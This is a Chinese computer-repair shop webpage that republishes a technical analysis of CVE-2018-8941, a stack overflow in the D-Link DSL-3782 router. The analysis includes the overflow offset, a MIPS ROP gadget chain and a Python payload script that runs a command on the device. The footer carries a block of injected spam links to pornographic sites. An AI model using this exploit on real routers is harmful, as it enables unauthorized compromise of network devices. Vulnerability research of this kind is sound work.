錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
D-Link DSL-3782 代碼路由器漏洞分析CVE-2018-8941 遠程代碼執行

作者: 佚名  日期:2018-05-23 14:25:20   來源: 本站整理

一. 漏洞概述

CVE-2018-8941 D-Link DSL-3782 代碼執行 

友訊科技股份有限公司成立于1986年,專注于電腦網路設備的設計開發,并自創「D-Link」品牌,行銷全球。

此漏洞位于 D-Link DSL-3782路由器,授權用戶可以遠程代碼執行

參考信息:https://github.com/SECFORCE/CVE-2018-8941#cve-2018-8941-d-link-dsl-3782-code-execution-proof-of-concept

漏洞固件版本:DSL-3782_A1_EU_1.01_07282016.bin

下載鏈接:

https://eu.dlink.com/cz/cs/products/dsl-3782-wireless-ac1200-dual-band-vdsl-adsl-modem-router#Technical-Specifications

漏洞存在于 “/USEFS/BI/TCAPI”二進制文件中,它被用作Web GUI中“診斷”功能的實現代碼,一個經過身份驗證的用戶可以使用一個長緩沖區作為參數,導致內存損壞。此外,可以重定向程序的流程并執行任意代碼。

 

 

二. 漏洞分析

 

 

2.1 控制eip

 

 

/userfs/bin/tcapi輸入不當的參數會觸發漏洞

 

 

MIPS 大端結構

 

 

路由器漏洞分析第七彈:CVE-2018-8941 遠程代碼執行

 

 

Tcapiset 命令用法如下

 

 

路由器漏洞分析第七彈:CVE-2018-8941 遠程代碼執行

 

 

tcapi set會調用Libtcapi.so.1中的tcapi_set函數

 

 

其中第二個Strcpy拷貝未驗證src的長度,導致棧溢出

 

 

路由器漏洞分析第七彈:CVE-2018-8941 遠程代碼執行

 

 

ra放在-4 ,拷貝的目標地址在- 0×258,0×258-0×4=596,

 

 

Payload=”A”*596+”BBBB”測試一下

 

 

圖片.png

 

 

路由器漏洞分析第七彈:CVE-2018-8941 遠程代碼執行

 

 

Crash的時候,eip為42424242,位置正確,此時s1,s0,s2,s3 可以被控制

 

 

路由器漏洞分析第七彈:CVE-2018-8941 遠程代碼執行

 

 

2.2 構造rop鏈

 

 

貌似還是很友好

 

 

路由器漏洞分析第七彈:CVE-2018-8941 遠程代碼執行

 

 

由于本身文件很小,可能不太好找到合適的godget,看下內存,用了如下的lib文件

 

 

路由器漏洞分析第七彈:CVE-2018-8941 遠程代碼執行

 

 

Libc里面的godget比較多,mips下的rop主要是去找到 move t9,xxx;jalrt9這樣的指令來達到控制執行流程的目的,其中xxx是我們在溢出的時候可以控制的寄存器。此漏洞中我們可以控制s0,s1,s2,s3 寄存器。

 

 

用misprop插件在IDA 搜索godget

 

 

直接搜索從棧中讀取參數到寄存器的godget

 

 

路由器漏洞分析第七彈:CVE-2018-8941 遠程代碼執行

 

 

找到如下的godget,把棧中的參數放到s5,再直接放到a0作為下一個call參數,并把system的地址從s0傳到t9,一個godget搞定

 

 

路由器漏洞分析第七彈:CVE-2018-8941 遠程代碼執行

 

 

現在只差s5 的值了,可以看到s5=sp+0×10,那么在payload中ra的后面16字節后再放我們需要system執行的參數

 

 

路由器漏洞分析第七彈:CVE-2018-8941 遠程代碼執行

 

 

我們的參數需要放到

 

 

構造如下的payload:

#!/usr/bin/envpython  import sys  import struct  libc =0x40868000  s0=struct.pack(">I",0x408C1BB0)#system  s1=struct.pack(">I",0x41414141)#useless  s2=struct.pack(">I",0x43434343)#useless  s3=struct.pack(">I",0x44444444)#useless  ra=struct.pack(">I",0x4087E56C)#godget1  x="A"*580+s0+s1+s2+s3+ra+"x"*16+"ls"

 

 

 

執行后,

 

 

可以在截圖中看到,成功執行了我們的遠程命令“ls“”

 

 

路由器漏洞分析第七彈:CVE-2018-8941 遠程代碼執行

*本文作者:kczwa1,轉載請注明來自FreeBuf.COM



熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數和判...
  • IIS 8 開啟 GZIP壓縮來減少網絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅動時提示不包含數字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    主站蜘蛛池模板: 亚洲heyzo专区无码综合| 无码内射中文字幕岛国片| 无码人妻久久一区二区三区免费丨| 无码AV波多野结衣久久| 成人无码嫩草影院| 国产成人精品无码播放| 少妇爆乳无码专区| 亚洲日韩精品无码专区网址| 无码精品A∨在线观看十八禁 | 免费无码黄网站在线看| 日韩精品人妻系列无码专区| 影音先锋无码a∨男人资源站| 亚洲av永久无码精品网站| 毛片亚洲AV无码精品国产午夜| 亚洲AV无码精品色午夜果冻不卡 | 精品欧洲av无码一区二区14| 无码专区国产无套粉嫩白浆内射 | 无码av天天av天天爽| 亚洲AV综合色区无码一区爱AV| 特黄熟妇丰满人妻无码| 性饥渴少妇AV无码毛片| 无码人妻AⅤ一区二区三区 | 潮喷失禁大喷水无码| 曰韩无码无遮挡A级毛片| 久久亚洲精品无码aⅴ大香| 高潮潮喷奶水飞溅视频无码| 无码熟妇αⅴ人妻又粗又大| 亚洲日韩精品无码专区加勒比☆| 午夜亚洲AV日韩AV无码大全 | 日本无码WWW在线视频观看| 国产激情无码一区二区app| 免费无码又爽又刺激一高潮| 国产成人无码免费网站| 精品无码人妻久久久久久| heyzo专区无码综合| 久久精品无码av| 国产色综合久久无码有码| 国产成人无码一区二区在线观看| 国产成人无码av| 特级无码毛片免费视频尤物 | 国产午夜无码视频在线观看|